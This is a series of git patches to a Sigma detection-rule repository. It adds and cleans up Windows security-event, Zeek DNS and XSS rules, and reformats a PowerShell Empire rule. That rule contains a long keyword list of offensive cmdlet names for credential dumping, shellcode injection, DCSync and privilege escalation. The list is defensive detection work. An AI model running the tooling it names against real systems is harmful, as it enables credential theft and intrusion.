'Get-ApplicationHost' + - 'Write-UserAddMSI' + - 'Invoke-AllChecks' + - 'Invoke-ThreadedFunction' + - 'Test-Login' + - 'Get-UserAgent' + - 'Test-Password' + - 'Get-ComputerDetails' + - 'Find-4648Logons' + - 'Find-4624Logons' + - 'Find-AppLockerLogs' + - 'Find-PSScriptsInPSAppLog' + - 'Find-RDPClientConnections' + - 'Get-SystemDNSServer' + - 'Invoke-Paranoia' + - 'Invoke-WinEnum{' + - 'Get-SPN' + - 'Invoke-ARPScan' + - 'Invoke-Portscan' + - 'Invoke-ReverseDNSLookup' + - 'Invoke-SMBScanner' + - 'New-InMemoryModule' + - 'Add-Win32Type' + - 'Export-PowerViewCSV' + - 'Get-MacAttribute' + - 'Copy-ClonedFile' + - 'Get-IPAddress' + - 'Convert-NameToSid' + - 'Convert-SidToName' + - 'Convert-NT4toCanonical' + - 'Get-Proxy' + - 'Get-PathAcl' + - 'Get-NameField' + - 'Convert-LDAPProperty' + - 'Get-NetDomainController' + - 'Add-NetUser' + - 'Add-NetGroupUser' + - 'Get-UserProperty' + - 'Find-UserField' + - 'Get-UserEvent' + - 'Get-ObjectAcl' + - 'Add-ObjectAcl' + - 'Invoke-ACLScanner' + - 'Get-GUIDMap' + - 'Get-ADObject' + - 'Set-ADObject' + - 'Get-ComputerProperty' + - 'Find-ComputerField' + - 'Get-NetOU' + - 'Get-NetSite' + - 'Get-NetSubnet' + - 'Get-DomainSID' + - 'Get-NetGroup' + - 'Get-NetFileServer' + - 'SplitPath' + - 'Get-DFSshare' + - 'Get-DFSshareV1' + - 'Get-DFSshareV2' + - 'Get-GptTmpl' + - 'Get-GroupsXML' + - 'Get-NetGPO' + - 'Get-NetGPOGroup' + - 'Find-GPOLocation' + - 'Find-GPOComputerAdmin' + - 'Get-DomainPolicy' + - 'Get-NetLocalGroup' + - 'Get-NetShare' + - 'Get-NetLoggedon' + - 'Get-NetSession' + - 'Get-NetRDPSession' + - 'Invoke-CheckLocalAdminAccess' + - 'Get-LastLoggedOn' + - 'Get-NetProcess' + - 'Find-InterestingFile' + - 'Invoke-CheckWrite' + - 'Invoke-UserHunter' + - 'Invoke-StealthUserHunter' + - 'Invoke-ProcessHunter' + - 'Invoke-EventHunter' + - 'Invoke-ShareFinder' + - 'Invoke-FileFinder' + - 'Find-LocalAdminAccess' + - 'Get-ExploitableSystem' + - 'Invoke-EnumerateLocalAdmin' + - 'Get-NetDomainTrust' + - 'Get-NetForestTrust' + - 'Find-ForeignUser' + - 'Find-ForeignGroup' + - 'Invoke-MapDomainTrust' + - 'Get-Hex' + - 'Create-RemoteThread' + - 'Get-FoxDump' + - 'Decrypt-CipherText' + - 'Get-Screenshot' + - 'Start-HTTP-Server' + - 'Local:Invoke-CreateRemoteThread' + - 'Local:Get-Win32Functions' + - 'Local:Inject-NetRipper' + - 'GetCommandLine' + - 'ElevatePrivs' + - 'Get-RegKeyClass' + - 'Get-BootKey' + - 'Get-HBootKey' + - 'Get-UserName' + - 'Get-UserHashes' + - 'DecryptHashes' + - 'DecryptSingleHash' + - 'Get-UserKeys' + - 'DumpHashes' + - 'Enable-SeAssignPrimaryTokenPrivilege' + - 'Enable-Privilege' + - 'Set-DesktopACLs' + - 'Set-DesktopACLToAllowEveryone' + - 'Get-PrimaryToken' + - 'Get-ThreadToken' + - 'Get-TokenInformation' + - 'Get-UniqueTokens' + - 'Find-GPOLocation' + - 'Find-GPOComputerAdmin' + - 'Get-DomainPolicy' + - 'Get-NetLocalGroup' + - 'Get-NetShare' + - 'Get-NetLoggedon' + - 'Get-NetSession' + - 'Get-NetRDPSession' + - 'Invoke-CheckLocalAdminAccess' + - 'Get-LastLoggedOn' + - 'Get-NetProcess' + - 'Find-InterestingFile' + - 'Invoke-CheckWrite' + - 'Invoke-UserHunter' + - 'Invoke-StealthUserHunter' + - 'Invoke-ProcessHunter' + - 'Invoke-EventHunter' + - 'Invoke-ShareFinder' + - 'Invoke-FileFinder' + - 'Find-LocalAdminAccess' + - 'Get-ExploitableSystem' + - 'Invoke-EnumerateLocalAdmin' + - 'Get-NetDomainTrust' + - 'Get-NetForestTrust' + - 'Find-ForeignUser' + - 'Find-ForeignGroup' + - 'Invoke-MapDomainTrust' + - 'Get-Hex' + - 'Create-RemoteThread' + - 'Get-FoxDump' + - 'Decrypt-CipherText' + - 'Get-Screenshot' + - 'Start-HTTP-Server' + - 'Local:Invoke-CreateRemoteThread' + - 'Local:Get-Win32Functions' + - 'Local:Inject-NetRipper' + - 'GetCommandLine' + - 'ElevatePrivs' + - 'Get-RegKeyClass' + - 'Get-BootKey' + - 'Get-HBootKey' + - 'Get-UserName' + - 'Get-UserHashes' + - 'DecryptHashes' + - 'DecryptSingleHash' + - 'Get-UserKeys' + - 'DumpHashes' + - 'Enable-SeAssignPrimaryTokenPrivilege' + - 'Enable-Privilege' + - 'Set-DesktopACLs' + - 'Set-DesktopACLToAllowEveryone' + - 'Get-PrimaryToken' + - 'Get-ThreadToken' + - 'Get-TokenInformation' + - 'Get-UniqueTokens' + - 'Invoke-ImpersonateUser' + - 'Create-ProcessWithToken' + - 'Free-AllTokens' + - 'Enum-AllTokens' + - 'Invoke-RevertToSelf' + - 'Set-Speaker(\$Volume){\$wshShell' + - 'Local:Get-RandomString' + - 'Local:Invoke-PsExecCmd' + - 'Get-GPPPassword' + - 'Local:Inject-BypassStuff' + - 'Local:Invoke-CopyFile\(\$sSource,' + - 'ind-Fruit' + - 'New-IPv4Range' + - 'New-IPv4RangeFromCIDR' + - 'Parse-Hosts' + - 'Parse-ILHosts' + - 'Exclude-Hosts' + - 'Get-TopPort' + - 'Parse-Ports' + - 'Parse-IpPorts' + - 'Remove-Ports' + - 'Write-PortscanOut' + - 'Convert-SwitchtoBool' + - 'Get-ForeignUser' + - 'Get-ForeignGroup' + condition: selection1 or selection2 \ No newline at end of file diff --git a/rules/windows/builtin/win_user_acc_added_removed.yml b/rules/windows/builtin/win_user_acc_added_removed.yml new file mode 100644 index 00000000..d827a04c --- /dev/null +++ b/rules/windows/builtin/win_user_acc_added_removed.yml @@ -0,0 +1,25 @@ +title: Account added and removed from privileged groups +id: 7efc75ce-e2a4-400f-a8b1-283d3b0f2c60 +description: 'Identifies accounts that are added to privileged group and then quickly removed, which could be a sign of compromise.' +references: Azure Sentinel +level: Low +logsource: + service: Security + product: windows +tags: + - attack.persistence + - attack.privilege_escalation + - attack.t1098 + - attack.t1078 +detection: + selection1: + EventID: + - 4728 + - 4732 + - 4756 + selection2: + EventID: + - 4729 + - 4733 + - 4757 + condition: selection1 or selection2 diff --git a/rules/windows/builtin/win_user_acc_created_deleted.yml b/rules/windows/builtin/win_user_acc_created_deleted.yml new file mode 100644 index 00000000..48bd4be5 --- /dev/null +++ b/rules/windows/builtin/win_user_acc_created_deleted.yml @@ -0,0 +1,18 @@ +title: User account created and deleted within 10 mins +id: 4b93c5af-d20b-4236-b696-a28b8c51407f +description: 'Identifies when a user account is created and then deleted within 10 minutes. This can be an indication of compromise and + an adversary attempting to hide in the noise.' +references: Azure Sentinel +level: Medium +logsource: + service: Security + product: windows +tags: + - attack.persistence + - attack.privilege_escalation + - attack.t1098 + - attack.t1078 +detection: + selection: + EventID: 4720 + condition: selection \ No newline at end of file diff --git a/rules/windows/builtin/win_user_acc_enabled_disabled.yml b/rules/windows/builtin/win_user_acc_enabled_disabled.yml new file mode 100644 index 00000000..91559202 --- /dev/null +++ b/rules/windows/builtin/win_user_acc_enabled_disabled.yml @@ -0,0 +1,20 @@ +title: User account enabled and disabled +id: 3d023f64-8225-41a2-9570-2bd7c2c4535e +description: 'Identifies when a user account is enabled and then disabled. This can be an indication of compromise and + an adversary attempting to hide in the noise.' +references: Azure Sentinel +level: Medium +logsource: + service: Security + product: windows +tags: + - attack.persistence + - attack.privilege_escalation + - attack.t1098 + - attack.t1078 +detection: + selection: + EventID: + - 4722 + - 4725 + condition: selection diff --git a/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml b/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml new file mode 100644 index 00000000..831dfea2 --- /dev/null +++ b/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml @@ -0,0 +1,21 @@ +title: New user created and added to the built-in administrators group +id: aa1eff90-29d4-49dc-a3ea-b65199f516db +description: 'Identifies when a user account was created and then added to the builtin Administrators group. + This should be monitored closely and all additions reviewed.' +references: Azure Sentinel +level: Low +logsource: + service: Security + product: windows +tags: + - attack.persistence + - attack.privilege_escalation +relevantTechniques: + - attack.t1098 + - attack.t1078 +detection: + selection: + EventID: + - 4720 + - 4732 + condition: selection \ No newline at end of file From 12396f615c9f0528c8dc028a8317892fd1a389cc Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 15 Aug 2021 16:52:24 +0200 Subject: [PATCH 0353/1367] remove duplicate rule and fix errors --- ...creating_number_of_resources_detection.yml} | 0 rules/network/zeek/zeek_dns_mining_pools.yml | 5 ++--- rules/network/zeek/zeek_dns_torproxy.yml | 2 +- .../builtin/win_anomaly_process_execution.yml | 5 ++--- .../windows/builtin/win_event_log_cleared.yml | 2 +- .../windows/builtin/win_powershelll_empire.yml | 10 ++++------ .../builtin/win_user_acc_added_removed.yml | 2 +- .../builtin/win_user_acc_created_deleted.yml | 18 ------------------ .../builtin/win_user_acc_enabled_disabled.yml | 2 +- ...win_user_created_added_to_bultin_admins.yml | 2 +- 10 files changed, 13 insertions(+), 35 deletions(-) rename rules/cloud/azure/{azure_creating_number_of_resources_detection.yaml => azure_creating_number_of_resources_detection.yml} (100%) delete mode 100644 rules/windows/builtin/win_user_acc_created_deleted.yml diff --git a/rules/cloud/azure/azure_creating_number_of_resources_detection.yaml b/rules/cloud/azure/azure_creating_number_of_resources_detection.yml similarity index 100% rename from rules/cloud/azure/azure_creating_number_of_resources_detection.yaml rename to rules/cloud/azure/azure_creating_number_of_resources_detection.yml diff --git a/rules/network/zeek/zeek_dns_mining_pools.yml b/rules/network/zeek/zeek_dns_mining_pools.yml index f45df340..281e3779 100644 --- a/rules/network/zeek/zeek_dns_mining_pools.yml +++ b/rules/network/zeek/zeek_dns_mining_pools.yml @@ -1,10 +1,9 @@ id: bf74135c-18e8-4a72-a926-0e4f47888c19 title: DNS events related to mining pools -description: | - 'Identifies IPs that may be performing DNS lookups associated with common currency mining pools.' +description: Identifies IPs that may be performing DNS lookups associated with common currency mining pools. reference: Azure Sentinel author: Saw Winn Naung -severity: Medium +severity: medium logsource: service: dns product: zeek diff --git a/rules/network/zeek/zeek_dns_torproxy.yml b/rules/network/zeek/zeek_dns_torproxy.yml index 1249c6ad..6a3e8a77 100644 --- a/rules/network/zeek/zeek_dns_torproxy.yml +++ b/rules/network/zeek/zeek_dns_torproxy.yml @@ -4,7 +4,7 @@ description: | 'Identifies IPs performing DNS lookups associated with common Tor proxies.' reference: Azure Sentinel author: Saw Winn Naung -severity: Medium +severity: medium logsource: service: dns product: zeek diff --git a/rules/windows/builtin/win_anomaly_process_execution.yml b/rules/windows/builtin/win_anomaly_process_execution.yml index 1a38f02a..2746bf8f 100644 --- a/rules/windows/builtin/win_anomaly_process_execution.yml +++ b/rules/windows/builtin/win_anomaly_process_execution.yml @@ -2,16 +2,15 @@ title: Process execution anomaly id: 2c55fe7a-b06f-4029-a5b9-c54a2320d7b8 description: 'Identifies anomalous executions of sensitive processes which are often leveraged as attack vectors.' references: Azure Sentinel -level: Medium +level: medium logsource: - service: Security product: windows + category: process_creation tags: - attack.execution - attack.t1064 detection: selection: - EventID: 4688 NewProcessName|contains: - 'powershell.exe' - 'cmd.exe' diff --git a/rules/windows/builtin/win_event_log_cleared.yml b/rules/windows/builtin/win_event_log_cleared.yml index 2540d98e..ac7e1691 100644 --- a/rules/windows/builtin/win_event_log_cleared.yml +++ b/rules/windows/builtin/win_event_log_cleared.yml @@ -5,7 +5,7 @@ description: | 'Checks for event id 1102 which indicates the security event log was cleared.' reference: Azure Sentinel author: Saw Winn Naung -severity: Medium +severity: medium logsource: service: security product: windows diff --git a/rules/windows/builtin/win_powershelll_empire.yml b/rules/windows/builtin/win_powershelll_empire.yml index f3883029..e4883f3e 100644 --- a/rules/windows/builtin/win_powershelll_empire.yml +++ b/rules/windows/builtin/win_powershelll_empire.yml @@ -1,19 +1,17 @@ title: Powershell Empire cmdlets seen in command line id: ef88eb96-861c-43a0-ab16-f3835a97c928 -description: | - 'Identifies instances of PowerShell Empire cmdlets in powershell process command line data.' +description: Identifies instances of PowerShell Empire cmdlets in powershell process command line data. references: Azure Sentinel -level: Medium +level: medium logsource: - service: Security - product: windows + product: windows + category: process_creation tags: - attack.execution - attack.persistence - attack.t1208 detection: selection1: - EventID: 4688 CommandLine|contains: ' -encodedCommand' selection2: CommandLine: diff --git a/rules/windows/builtin/win_user_acc_added_removed.yml b/rules/windows/builtin/win_user_acc_added_removed.yml index d827a04c..e3fe87b9 100644 --- a/rules/windows/builtin/win_user_acc_added_removed.yml +++ b/rules/windows/builtin/win_user_acc_added_removed.yml @@ -2,7 +2,7 @@ title: Account added and removed from privileged groups id: 7efc75ce-e2a4-400f-a8b1-283d3b0f2c60 description: 'Identifies accounts that are added to privileged group and then quickly removed, which could be a sign of compromise.' references: Azure Sentinel -level: Low +level: low logsource: service: Security product: windows diff --git a/rules/windows/builtin/win_user_acc_created_deleted.yml b/rules/windows/builtin/win_user_acc_created_deleted.yml deleted file mode 100644 index 48bd4be5..00000000 --- a/rules/windows/builtin/win_user_acc_created_deleted.yml +++ /dev/null @@ -1,18 +0,0 @@ -title: User account created and deleted within 10 mins -id: 4b93c5af-d20b-4236-b696-a28b8c51407f -description: 'Identifies when a user account is created and then deleted within 10 minutes. This can be an indication of compromise and - an adversary attempting to hide in the noise.' -references: Azure Sentinel -level: Medium -logsource: - service: Security - product: windows -tags: - - attack.persistence - - attack.privilege_escalation - - attack.t1098 - - attack.t1078 -detection: - selection: - EventID: 4720 - condition: selection \ No newline at end of file diff --git a/rules/windows/builtin/win_user_acc_enabled_disabled.yml b/rules/windows/builtin/win_user_acc_enabled_disabled.yml index 91559202..a6cd343c 100644 --- a/rules/windows/builtin/win_user_acc_enabled_disabled.yml +++ b/rules/windows/builtin/win_user_acc_enabled_disabled.yml @@ -3,7 +3,7 @@ id: 3d023f64-8225-41a2-9570-2bd7c2c4535e description: 'Identifies when a user account is enabled and then disabled. This can be an indication of compromise and an adversary attempting to hide in the noise.' references: Azure Sentinel -level: Medium +level: medium logsource: service: Security product: windows diff --git a/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml b/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml index 831dfea2..639debc5 100644 --- a/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml +++ b/rules/windows/builtin/win_user_created_added_to_bultin_admins.yml @@ -3,7 +3,7 @@ id: aa1eff90-29d4-49dc-a3ea-b65199f516db description: 'Identifies when a user account was created and then added to the builtin Administrators group. This should be monitored closely and all additions reviewed.' references: Azure Sentinel -level: Low +level: low logsource: service: Security product: windows From 245cb6d5101ee8f024eb75747f4ad6f682da85a1 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 15 Aug 2021 18:55:44 +0200 Subject: [PATCH 0354/1367] fix more errors --- rules/network/zeek/zeek_dns_mining_pools.yml | 6 +- rules/network/zeek/zeek_dns_torproxy.yml | 9 +- rules/web/xss_keywords.yml | 4 +- .../builtin/win_anomaly_process_execution.yml | 6 +- .../windows/builtin/win_event_log_cleared.yml | 10 +- .../builtin/win_powershelll_empire.yml | 635 ++++++++---------- .../builtin/win_user_acc_added_removed.yml | 6 +- .../builtin/win_user_acc_enabled_disabled.yml | 7 +- ...in_user_created_added_to_bultin_admins.yml | 7 +- 9 files changed, 323 insertions(+), 367 deletions(-) diff --git a/rules/network/zeek/zeek_dns_mining_pools.yml b/rules/network/zeek/zeek_dns_mining_pools.yml index 281e3779..0de24200 100644 --- a/rules/network/zeek/zeek_dns_mining_pools.yml +++ b/rules/network/zeek/zeek_dns_mining_pools.yml @@ -1,9 +1,11 @@ id: bf74135c-18e8-4a72-a926-0e4f47888c19 title: DNS events related to mining pools description: Identifies IPs that may be performing DNS lookups associated with common currency mining pools. -reference: Azure Sentinel +references: + - Azure Sentinel +date: 2021/08/15 author: Saw Winn Naung -severity: medium +level: medium logsource: service: dns product: zeek diff --git a/rules/network/zeek/zeek_dns_torproxy.yml b/rules/network/zeek/zeek_dns_torproxy.yml index 6a3e8a77..466ab203 100644 --- a/rules/network/zeek/zeek_dns_torproxy.yml +++ b/rules/network/zeek/zeek_dns_torproxy.yml @@ -1,10 +1,11 @@ id: a8322756-015c-42e7-afb1-436e85ed3ff5 title: DNS tor proxies -description: | - 'Identifies IPs performing DNS lookups associated with common Tor proxies.' -reference: Azure Sentinel +description: Identifies IPs performing DNS lookups associated with common Tor proxies. +references: + - Azure Sentinel +date: 2021/08/15 author: Saw Winn Naung -severity: medium +level: medium logsource: service: dns product: zeek diff --git a/rules/web/xss_keywords.yml b/rules/web/xss_keywords.yml index 2c17f38b..775ec871 100644 --- a/rules/web/xss_keywords.yml +++ b/rules/web/xss_keywords.yml @@ -1,9 +1,9 @@ title: Detect XSS Attempts by keywords -id: 553a450b8-604d-41a9-8587-a28334aaddfb +id: 65354b83-a2ea-4ea6-8414-3ab38be0d409 status: experimental description: Detects XSS that use GET requests by keyword searches in URL strings author: Saw Win Naung -date: 2020/02/22 +date: 2021/08/15 logsource: category: webserver detection: diff --git a/rules/windows/builtin/win_anomaly_process_execution.yml b/rules/windows/builtin/win_anomaly_process_execution.yml index 2746bf8f..176d64bd 100644 --- a/rules/windows/builtin/win_anomaly_process_execution.yml +++ b/rules/windows/builtin/win_anomaly_process_execution.yml @@ -1,7 +1,9 @@ -title: Process execution anomaly +title: Process Execution Anomaly id: 2c55fe7a-b06f-4029-a5b9-c54a2320d7b8 description: 'Identifies anomalous executions of sensitive processes which are often leveraged as attack vectors.' -references: Azure Sentinel +references: + - Azure Sentinel +date: 2021/08/15 level: medium logsource: product: windows diff --git a/rules/windows/builtin/win_event_log_cleared.yml b/rules/windows/builtin/win_event_log_cleared.yml index ac7e1691..0fdbdd54 100644 --- a/rules/windows/builtin/win_event_log_cleared.yml +++ b/rules/windows/builtin/win_event_log_cleared.yml @@ -1,16 +1,16 @@ id: a122ac13-daf8-4175-83a2-72c387be339d title: Security Event log cleared status: experimental -description: | - 'Checks for event id 1102 which indicates the security event log was cleared.' -reference: Azure Sentinel +description: Checks for event id 1102 which indicates the security event log was cleared. +references: + - Azure Sentinel +date: 2021/08/15 author: Saw Winn Naung -severity: medium +level: medium logsource: service: security product: windows tags: - - attack.t1107 detection: selection: diff --git a/rules/windows/builtin/win_powershelll_empire.yml b/rules/windows/builtin/win_powershelll_empire.yml index e4883f3e..8aa638ef 100644 --- a/rules/windows/builtin/win_powershelll_empire.yml +++ b/rules/windows/builtin/win_powershelll_empire.yml @@ -1,7 +1,9 @@ title: Powershell Empire cmdlets seen in command line id: ef88eb96-861c-43a0-ab16-f3835a97c928 description: Identifies instances of PowerShell Empire cmdlets in powershell process command line data. -references: Azure Sentinel +references: + - Azure Sentinel +date: 2021/08/15 level: medium logsource: product: windows @@ -15,347 +17,292 @@ detection: CommandLine|contains: ' -encodedCommand' selection2: CommandLine: - - 'SetDelay' - - 'GetDelay' - - 'Set-LostLimit' - - 'Get-LostLimit' - - 'Set-Killdate' - - 'Get-Killdate' - - 'Set-WorkingHours' - - 'Get-WorkingHours' - - 'Get-Sysinfo' - - 'Add-Servers' - - 'Invoke-ShellCommand' - - 'Start-AgentJob' - - 'Update-Profile' - - 'Get-FilePart' - - 'Encrypt-Bytes' - - 'Decrypt-Bytes' - - 'Encode-Packet' - - 'Decode-Packet' - - 'Send-Message' - - 'Process-Packet' - - 'Process-Tasking' - - 'Get-Task' - - 'Start-Negotiate' - - 'Invoke-DllInjection' - - 'Invoke-ReflectivePEInjection' - - 'Invoke-Shellcode' - - 'Invoke-ShellcodeMSIL' - - 'Get-ChromeDump' - - 'Get-ClipboardContents' - - 'Get-IndexedItem' - - 'Get-Keystrokes' - - 'Invoke-Inveigh' - - 'Invoke-NetRipper' - - 'local:Invoke-PatchDll' - - 'Invoke-NinjaCopy' - - 'Get-Win32Types' - - 'Get-Win32Constants' - - 'Get-Win32Functions' - - 'Sub-SignedIntAsUnsigned' - - 'Add-SignedIntAsUnsigned' - - 'Compare-Val1GreaterThanVal2AsUInt' - - 'Convert-UIntToInt' - - 'Test-MemoryRangeValid' - - 'Write-BytesToMemory' - - 'Get-DelegateType' - - 'Get-ProcAddress' - - 'Enable-SeDebugPrivilege' - - 'Invoke-CreateRemoteThread' - - 'Get-ImageNtHeaders' - - 'Get-PEBasicInfo' - - 'Get-PEDetailedInfo' - - 'Import-DllInRemoteProcess' - - 'Get-RemoteProcAddress' - - 'Copy-Sections' - - 'Update-MemoryAddresses' - - 'Import-DllImports' - - 'Get-VirtualProtectValue' - - 'Update-MemoryProtectionFlags' - - 'Update-ExeFunctions' - - 'Copy-ArrayOfMemAddresses' - - 'Get-MemoryProcAddress' - - 'Invoke-MemoryLoadLibrary' - - 'Invoke-MemoryFreeLibrary' - - 'Out-Minidump' - - 'Get-VaultCredential' - - 'Invoke-DCSync' - - 'Translate-Name' - - 'Get-NetDomain' - - 'Get-NetForest' - - 'Get-NetForestDomain' - - 'Get-DomainSearcher' - - 'Get-NetComputer' - - 'Get-NetGroupMember' - - 'Get-NetUser' - - 'Invoke-Mimikatz' - - 'Invoke-PowerDump' - - 'Invoke-TokenManipulation' - - 'Exploit-JMXConsole' - - 'Exploit-JBoss' - - 'Invoke-Thunderstruck' - - 'Invoke-VoiceTroll' - - 'Set-WallPaper' - - 'Invoke-PsExec' - - 'Invoke-SSHCommand' - - 'Invoke-PSInject' - - 'Invoke-RunAs' - - 'Invoke-SendMail' - - 'Invoke-Rule' - - 'Get-OSVersion' - - 'Select-EmailItem' - - 'View-Email' - - 'Get-OutlookFolder' - - 'Get-EmailItems' - - 'Invoke-MailSearch' - - 'Get-SubFolders' - - 'Get-GlobalAddressList' - - 'Invoke-SearchGAL' - - 'Get-SMTPAddress' - - 'Disable-SecuritySettings' - - 'Reset-SecuritySettings' - - 'Get-OutlookInstance' - - 'New-HoneyHash' - - 'Set-MacAttribute' - - 'Invoke-PatchDll' - - 'Get-SecurityPackages' - - 'Install-SSP' - - 'Invoke-BackdoorLNK' - - 'New-ElevatedPersistenceOption' - - 'New-UserPersistenceOption' - - 'Add-Persistence' - - 'Invoke-CallbackIEX' - - 'Add-PSFirewallRules' - - 'Invoke-EventLoop' - - 'Invoke-PortBind' - - 'Invoke-DNSLoop' - - 'Invoke-PacketKnock' - - 'Invoke-CallbackLoop' - - 'Invoke-BypassUAC' - - 'Get-DecryptedCpassword' - - 'Get-GPPInnerFields' - - 'Invoke-WScriptBypassUAC' - - 'Get-ModifiableFile' - - 'Get-ServiceUnquoted' - - 'Get-ServiceFilePermission' - - 'Get-ServicePermission' - - 'Invoke-ServiceUserAdd' - - 'Invoke-ServiceCMD' - - 'Write-UserAddServiceBinary' - - 'Write-CMDServiceBinary' - - 'Write-ServiceEXE' - - 'Write-ServiceEXECMD' - - 'Restore-ServiceEXE' - - 'Invoke-ServiceStart' - - 'Invoke-ServiceStop' - - 'Invoke-ServiceEnable' - - 'Invoke-ServiceDisable' - - 'Get-ServiceDetail' - - 'Find-DLLHijack' - - 'Find-PathHijack' - - 'Write-HijackDll' - - 'Get-RegAlwaysInstallElevated' - - 'Get-RegAutoLogon' - - 'Get-VulnAutoRun' - - 'Get-VulnSchTask' - - 'Get-UnattendedInstallFile' - - 'Get-Webconfig' - - 'Get-ApplicationHost' - - 'Write-UserAddMSI' - - 'Invoke-AllChecks' - - 'Invoke-ThreadedFunction' - - 'Test-Login' - - 'Get-UserAgent' - - 'Test-Password' - - 'Get-ComputerDetails' - - 'Find-4648Logons' - - 'Find-4624Logons' - - 'Find-AppLockerLogs' - - 'Find-PSScriptsInPSAppLog' - - 'Find-RDPClientConnections' - - 'Get-SystemDNSServer' - - 'Invoke-Paranoia' - - 'Invoke-WinEnum{' - - 'Get-SPN' - - 'Invoke-ARPScan' - - 'Invoke-Portscan' - - 'Invoke-ReverseDNSLookup' - - 'Invoke-SMBScanner' - - 'New-InMemoryModule' - - 'Add-Win32Type' - - 'Export-PowerViewCSV' - - 'Get-MacAttribute' - - 'Copy-ClonedFile' - - 'Get-IPAddress' - - 'Convert-NameToSid' - - 'Convert-SidToName' - - 'Convert-NT4toCanonical' - - 'Get-Proxy' - - 'Get-PathAcl' - - 'Get-NameField' - - 'Convert-LDAPProperty' - - 'Get-NetDomainController' - - 'Add-NetUser' - - 'Add-NetGroupUser' - - 'Get-UserProperty' - - 'Find-UserField' - - 'Get-UserEvent' - - 'Get-ObjectAcl' - - 'Add-ObjectAcl' - - 'Invoke-ACLScanner' - - 'Get-GUIDMap' - - 'Get-ADObject' - - 'Set-ADObject' - - 'Get-ComputerProperty' - - 'Find-ComputerField' - - 'Get-NetOU' - - 'Get-NetSite' - - 'Get-NetSubnet' - - 'Get-DomainSID' - - 'Get-NetGroup' - - 'Get-NetFileServer' - - 'SplitPath' - - 'Get-DFSshare' - - 'Get-DFSshareV1' - - 'Get-DFSshareV2' - - 'Get-GptTmpl' - - 'Get-GroupsXML' - - 'Get-NetGPO' - - 'Get-NetGPOGroup' - - 'Find-GPOLocation' - - 'Find-GPOComputerAdmin' - - 'Get-DomainPolicy' - - 'Get-NetLocalGroup' - - 'Get-NetShare' - - 'Get-NetLoggedon' - - 'Get-NetSession' - - 'Get-NetRDPSession' - - 'Invoke-CheckLocalAdminAccess' - - 'Get-LastLoggedOn' - - 'Get-NetProcess' - - 'Find-InterestingFile' - - 'Invoke-CheckWrite' - - 'Invoke-UserHunter' - - 'Invoke-StealthUserHunter' - - 'Invoke-ProcessHunter' - - 'Invoke-EventHunter' - - 'Invoke-ShareFinder' - - 'Invoke-FileFinder' - - 'Find-LocalAdminAccess' - - 'Get-ExploitableSystem' - - 'Invoke-EnumerateLocalAdmin' - - 'Get-NetDomainTrust' - - 'Get-NetForestTrust' - - 'Find-ForeignUser' - - 'Find-ForeignGroup' - - 'Invoke-MapDomainTrust' - - 'Get-Hex' - - 'Create-RemoteThread' - - 'Get-FoxDump' - - 'Decrypt-CipherText' - - 'Get-Screenshot' - - 'Start-HTTP-Server' - - 'Local:Invoke-CreateRemoteThread' - - 'Local:Get-Win32Functions' - - 'Local:Inject-NetRipper' - - 'GetCommandLine' - - 'ElevatePrivs' - - 'Get-RegKeyClass' - - 'Get-BootKey' - - 'Get-HBootKey' - - 'Get-UserName' - - 'Get-UserHashes' - - 'DecryptHashes' - - 'DecryptSingleHash' - - 'Get-UserKeys' - - 'DumpHashes' - - 'Enable-SeAssignPrimaryTokenPrivilege' - - 'Enable-Privilege' - - 'Set-DesktopACLs' - - 'Set-DesktopACLToAllowEveryone' - - 'Get-PrimaryToken' - - 'Get-ThreadToken' - - 'Get-TokenInformation' - - 'Get-UniqueTokens' - - 'Find-GPOLocation' - - 'Find-GPOComputerAdmin' - - 'Get-DomainPolicy' - - 'Get-NetLocalGroup' - - 'Get-NetShare' - - 'Get-NetLoggedon' - - 'Get-NetSession' - - 'Get-NetRDPSession' - - 'Invoke-CheckLocalAdminAccess' - - 'Get-LastLoggedOn' - - 'Get-NetProcess' - - 'Find-InterestingFile' - - 'Invoke-CheckWrite' - - 'Invoke-UserHunter' - - 'Invoke-StealthUserHunter' - - 'Invoke-ProcessHunter' - - 'Invoke-EventHunter' - - 'Invoke-ShareFinder' - - 'Invoke-FileFinder' - - 'Find-LocalAdminAccess' - - 'Get-ExploitableSystem' - - 'Invoke-EnumerateLocalAdmin' - - 'Get-NetDomainTrust' - - 'Get-NetForestTrust' - - 'Find-ForeignUser' - - 'Find-ForeignGroup' - - 'Invoke-MapDomainTrust' - - 'Get-Hex' - - 'Create-RemoteThread' - - 'Get-FoxDump' - - 'Decrypt-CipherText' - - 'Get-Screenshot' - - 'Start-HTTP-Server' - - 'Local:Invoke-CreateRemoteThread' - - 'Local:Get-Win32Functions' - - 'Local:Inject-NetRipper' - - 'GetCommandLine' - - 'ElevatePrivs' - - 'Get-RegKeyClass' - - 'Get-BootKey' - - 'Get-HBootKey' - - 'Get-UserName' - - 'Get-UserHashes' - - 'DecryptHashes' - - 'DecryptSingleHash' - - 'Get-UserKeys' - - 'DumpHashes' - - 'Enable-SeAssignPrimaryTokenPrivilege' - - 'Enable-Privilege' - - 'Set-DesktopACLs' - - 'Set-DesktopACLToAllowEveryone' - - 'Get-PrimaryToken' - - 'Get-ThreadToken' - - 'Get-TokenInformation' - - 'Get-UniqueTokens' - - 'Invoke-ImpersonateUser' - - 'Create-ProcessWithToken' - - 'Free-AllTokens' - - 'Enum-AllTokens' - - 'Invoke-RevertToSelf' - - 'Set-Speaker(\$Volume){\$wshShell' - - 'Local:Get-RandomString' - - 'Local:Invoke-PsExecCmd' - - 'Get-GPPPassword' - - 'Local:Inject-BypassStuff' - - 'Local:Invoke-CopyFile\(\$sSource,' - - 'ind-Fruit' - - 'New-IPv4Range' - - 'New-IPv4RangeFromCIDR' - - 'Parse-Hosts' - - 'Parse-ILHosts' - - 'Exclude-Hosts' - - 'Get-TopPort' - - 'Parse-Ports' - - 'Parse-IpPorts' - - 'Remove-Ports' - - 'Write-PortscanOut' - - 'Convert-SwitchtoBool' - - 'Get-ForeignUser' - - 'Get-ForeignGroup' + - 'SetDelay' + - 'GetDelay' + - 'Set-LostLimit' + - 'Get-LostLimit' + - 'Set-Killdate' + - 'Get-Killdate' + - 'Set-WorkingHours' + - 'Get-WorkingHours' + - 'Get-Sysinfo' + - 'Add-Servers' + - 